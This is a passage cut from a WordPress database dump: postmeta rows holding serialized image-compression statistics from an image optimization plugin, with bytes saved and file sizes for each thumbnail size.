:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:2484;s:10:\"size_after\";i:2484;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4198,2413,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:0.1587931718936085589977125209770747460424900054931640625;s:5:\"bytes\";i:4;s:11:\"size_before\";i:2519;s:10:\"size_after\";i:2515;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:1:{s:4:\"full\";O:8:\"stdClass\":5:{s:7:\"percent\";d:0.1600000000000000033306690738754696212708950042724609375;s:5:\"bytes\";i:4;s:11:\"size_before\";i:2519;s:10:\"size_after\";i:2515;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4199,2411,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:35.895610913404510711188777349889278411865234375;s:5:\"bytes\";i:4539;s:11:\"size_before\";i:12645;s:10:\"size_after\";i:8106;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:39.78999999999999914734871708787977695465087890625;s:5:\"bytes\";i:4183;s:11:\"size_before\";i:10513;s:10:\"size_after\";i:6330;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:16.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:356;s:11:\"size_before\";i:2132;s:10:\"size_after\";i:1776;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4200,2410,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:32.76303548487130257171884295530617237091064453125;s:5:\"bytes\";i:36978;s:11:\"size_before\";i:112865;s:10:\"size_after\";i:75887;s:4:\"time\";d:0.560000000000000053290705182007513940334320068359375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.440000000000001278976924368180334568023681640625;s:5:\"bytes\";i:4459;s:11:\"size_before\";i:15678;s:10:\"size_after\";i:11219;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:35.0499999999999971578290569595992565155029296875;s:5:\"bytes\";i:13878;s:11:\"size_before\";i:39591;s:10:\"size_after\";i:25713;s:4:\"time\";d:0.2399999999999999911182158029987476766109466552734375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:29.5;s:5:\"bytes\";i:7046;s:11:\"size_before\";i:23882;s:10:\"size_after\";i:16836;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:34.3900000000000005684341886080801486968994140625;s:5:\"bytes\";i:11595;s:11:\"size_before\";i:33714;s:10:\"size_after\";i:22119;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}}}'),(4201,2409,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:25.804171085189114620561667834408581256866455078125;s:5:\"bytes\";i:17520;s:11:\"size_before\";i:67896;s:10:\"size_after\";i:50376;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:2369;s:11:\"size_before\";i:11885;s:10:\"size_after\";i:9516;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:26.129999999999999005240169935859739780426025390625;s:5:\"bytes\";i:7508;s:11:\"size_before\";i:28731;s:10:\"size_after\";i:21223;s:4:\"time\";d:0.1700000000000000122124532708767219446599483489990234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:7643;s:11:\"size_before\";i:27280;s:10:\"size_after\";i:19637;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4202,2408,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:28.944562523390221286945234169252216815948486328125;s:5:\"bytes\";i:40991;s:11:\"size_before\";i:141619;s:10:\"size_after\";i:100628;s:4:\"time\";d:0.440000000000000002220446049250313080847263336181640625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:31.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:6185;s:11:\"size_before\";i:19510;s:10:\"size_after\";i:13325;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.469999999999998863131622783839702606201171875;s:5:\"bytes\";i:13336;s:11:\"size_before\";i:46844;s:10:\"size_after\";i:33508;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:8249;s:11:\"size_before\";i:29128;s:10:\"size_after\";i:20879;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:28.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:13221;s:11:\"size_before\";i:46137;s:10:\"size_after\";i:32916;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4203,2407,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.73874407854435730769182555377483367919921875;s:5:\"bytes\";i:70297;s:11:\"size_before\";i:654611;s:10:\"size_after\";i:584314;s:4:\"time\";d:1.8000000000000000444089209850062616169452667236328125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:19845;s:10:\"size_after\";i:19845;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:1.979999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:1028;s:11:\"size_before\";i:52024;s:10:\"size_after\";i:50996;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:27785;s:11:\"size_before\";i:277651;s:10:\"size_after\";i:249866;s:4:\"time\";d:0.66000000000000003108624468950438313186168670654296875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.3800000000000007815970093361102044582366943359375;s:5:\"bytes\";i:3817;s:11:\"size_before\";i:36773;s:10:\"size_after\";i:32956;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:13228;s:11:\"size_before\";i:100126;s:10:\"size_after\";i:86898;s:4:\"time\";d:0.299999999999999988897769753748434595763683319091796875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.5299999999999993605115378159098327159881591796875;s:5:\"bytes\";i:24439;s:11:\"size_before\";i:168192;s:10:\"size_after\";i:143753;s:4:\"time\";d:0.5500000000000000444089209850062616169452667236328125;}}}'),(4204,2405,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:9.81216656787196228606262593530118465423583984375;s:5:\"bytes\";i:5297;s:11:\"size_before\";i:53984;s:10:\"size_after\";i:48687;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:418;s:11:\"size_before\";i:3814;s:10:\"size_after\";i:3396;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:1119;s:11:\"size_before\";i:8824;s:10:\"size_after\";i:7705;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:493;s:11:\"size_before\";i:6533;s:10:\"size_after\";i:6040;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1148;s:11:\"size_before\";i:13958;s:10:\"size_after\";i:12810;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.160000000000000142108547152020037174224853515625;s:5:\"bytes\";i:2119;s:11:\"size_before\";i:20855;s:10:\"size_after\";i:18736;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}}}'),(4205,2404,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.49633023630732697739631475997157394886016845703125;s:5:\"bytes\";i:6125;s:11:\"size_before\";i:94284;s:10:\"size_after\";i:88159;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.67999999999999971578290569595992565155029296875;s:5:\"bytes\";i:330;s:11:\"size_before\";i:5806;s:10:\"size_after\";i:5476;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1037;s:11:\"size_before\";i:15937;s:10:\"size_after\";i:14900;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:630;s:11:\"size_before\";i:10924;s:10:\"size_after\";i:10294;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.55999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:1886;s:11:\"size_before\";i:28746;s:10:\"size_after\";i:26860;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.82000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2242;s:11:\"size_before\";i:32871;s:10:\"size_after\";i:30629;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4206,2403,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:355108;s:10:\"size_after\";i:355108;s:4:\"time\";d:0.33999999999999996891375531049561686813831329345703125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:17882;s:10:\"size_after\";i:17882;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:44005;s:10:\"size_after\";i:44005;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39606;s:10:\"size_after\";i:39606;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:118114;s:10:\"size_after\";i:118114;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:135501;s:10:\"size_after\";i:135501;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4207,2401,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.3209032627700452167118783108890056610107421875;s:5:\"bytes\";i:16847;s:11:\"size_before\";i:202466;s:10:\"size_after\";i:185619;s:4:\"time\";d:0.1299999999999999766853164828717126511037349700927734375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.29999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:316;s:11:\"size_before\";i:5012;s:10:\"size_after\";i:4696;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.46999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:974;s:11:\"size_before\";i:13045;s:10:\"size_after\";i:12071;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:4358;s:11:\"size_before\";i:48912;s:10:\"size_after\";i:44554;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.6899999999999995026200849679298698902130126953125;s:5:\"bytes\";i:7449;s:11:\"size_before\";i:76883;s:10:\"size_after\";i:69434;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5;s:5:\"bytes\";i:579;s:11:\"size_before\";i:8914;s:10:\"size_after\";i:8335;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.25;s:5:\"bytes\";i:1229;s:11:\"size_before\";i:19663;s:10:\"size_after\";i:18434;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.46999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1942;s:11:\"size_before\";i:30037;s:10:\"size_after\";i:28095;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4208,2400,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.1294394522892599042052097502164542675018310546875;s:5:\"bytes\";i:2877;s:11:\"size_before\";i:56088;s:10:\"size_after\";i:53211;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5;s:5:\"bytes\";i:331;s:11:\"size_before\";i:5092;s:10:\"size_after\";i:4761;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.9900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:501;s:11:\"size_before\";i:10035;s:10:\"size_after\";i:9534;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:432;s:11:\"size_before\";i:7832;s:10:\"size_after\";i:7400;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.86000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:727;s:11:\"size_before\";i:14952;s:10:\"size_after\";i:14225;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:4.87000000000000010658141036401502788066864013671875;s:5:\"bytes\";i:886;s:11:\"size_before\";i:18177;s:10:\"size_after\";i:17291;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4209,2399,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:7.3503325472996134948289181920699775218963623046875;s:5:\"bytes\";i:17362;s:11:\"size_before\";i:236207;s:10:\"size_after\";i:218845;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:7:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:380;s:11:\"size_before\";i:5293;s:10:\"size_after\";i:4913;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:868;s:11:\"size_before\";i:13342;s:10:\"size_after\";i:12474;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4900000000000002131628207280300557613372802734375;s:5:\"bytes\";i:4370;s:11:\"size_before\";i:58373;s:10:\"size_after\";i:54003;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:5:\"large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:7719;s:11:\"size_before\";i:96808;s:10:\"size_after\";i:89089;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.769999999999999573674358543939888477325439453125;s:5:\"bytes\";i:609;s:11:\"size_before\";i:8995;s:10:\"size_after\";i:8386;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.45000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1343;s:11:\"size_before\";i:20827;s:10:\"size_after\";i:19484;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.36000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:2073;s:11:\"size_before\";i:32569;s:10:\"size_after\";i:30496;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4210,2398,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.895172638532979902947772643528878688812255859375;s:5:\"bytes\";i:4655;s:11:\"size_before\";i:67511;s:10:\"size_after\";i:62856;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:305;s:11:\"size_before\";i:4753;s:10:\"size_after\";i:4448;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.95999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:875;s:11:\"size_before\";i:12580;s:10:\"size_after\";i:11705;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:508;s:11:\"size_before\";i:7933;s:10:\"size_after\";i:7425;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.45000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1080;s:11:\"size_before\";i:16746;s:10:\"size_after\";i:15666;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1887;s:11:\"size_before\";i:25499;s:10:\"size_after\";i:23612;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4211,2397,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:6.26594320343879918056018141214735805988311767578125;s:5:\"bytes\";i:4446;s:11:\"size_before\";i:70955;s:10:\"size_after\";i:66509;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.03000000000000024868995751603506505489349365234375;s:5:\"bytes\";i:328;s:11:\"size_before\";i:4669;s:10:\"size_after\";i:4341;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.5800000000000000710542735760100185871124267578125;s:5:\"bytes\";i:888;s:11:\"size_before\";i:11719;s:10:\"size_after\";i:10831;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.17999999999999971578290569595992565155029296875;s:5:\"bytes\";i:522;s:11:\"size_before\";i:8445;s:10:\"size_after\";i:7923;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.75;s:5:\"bytes\";i:1054;s:11:\"size_before\";i:18334;s:10:\"size_after\";i:17280;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.95000000000000017763568394002504646778106689453125;s:5:\"bytes\";i:1654;s:11:\"size_before\";i:27788;s:10:\"size_after\";i:26134;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4212,2396,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:5.9801956854886242354041314683854579925537109375;s:5:\"bytes\";i:5073;s:11:\"size_before\";i:84830;s:10:\"size_after\";i:79757;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.4199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:440;s:11:\"size_before\";i:5926;s:10:\"size_after\";i:5486;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.05999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:915;s:11:\"size_before\";i:15095;s:10:\"size_after\";i:14180;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.2400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:501;s:11:\"size_before\";i:9561;s:10:\"size_after\";i:9060;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.96999999999999975131004248396493494510650634765625;s:5:\"bytes\";i:1325;s:11:\"size_before\";i:22206;s:10:\"size_after\";i:20881;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:1892;s:11:\"size_before\";i:32042;s:10:\"size_after\";i:30150;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4213,2395,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.9736541633188142697008515824563801288604736328125;s:5:\"bytes\";i:4244;s:11:\"size_before\";i:47294;s:10:\"size_after\";i:43050;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.42999999999999971578290569595992565155029296875;s:5:\"bytes\";i:484;s:11:\"size_before\";i:5744;s:10:\"size_after\";i:5260;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8499999999999996447286321199499070644378662109375;s:5:\"bytes\";i:1040;s:11:\"size_before\";i:10562;s:10:\"size_after\";i:9522;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.1400000000000005684341886080801486968994140625;s:5:\"bytes\";i:835;s:11:\"size_before\";i:10257;s:10:\"size_after\";i:9422;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:1885;s:11:\"size_before\";i:20731;s:10:\"size_after\";i:18846;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4214,2394,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:67257;s:10:\"size_after\";i:67257;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:10218;s:10:\"size_after\";i:10218;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:21398;s:10:\"size_after\";i:21398;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35641;s:10:\"size_after\";i:35641;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4215,2393,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.6910667144672952844075553002767264842987060546875;s:5:\"bytes\";i:3894;s:11:\"size_before\";i:30683;s:10:\"size_after\";i:26789;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:5:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:320;s:11:\"size_before\";i:2533;s:10:\"size_after\";i:2213;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.410000000000000142108547152020037174224853515625;s:5:\"bytes\";i:785;s:11:\"size_before\";i:5855;s:10:\"size_after\";i:5070;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\"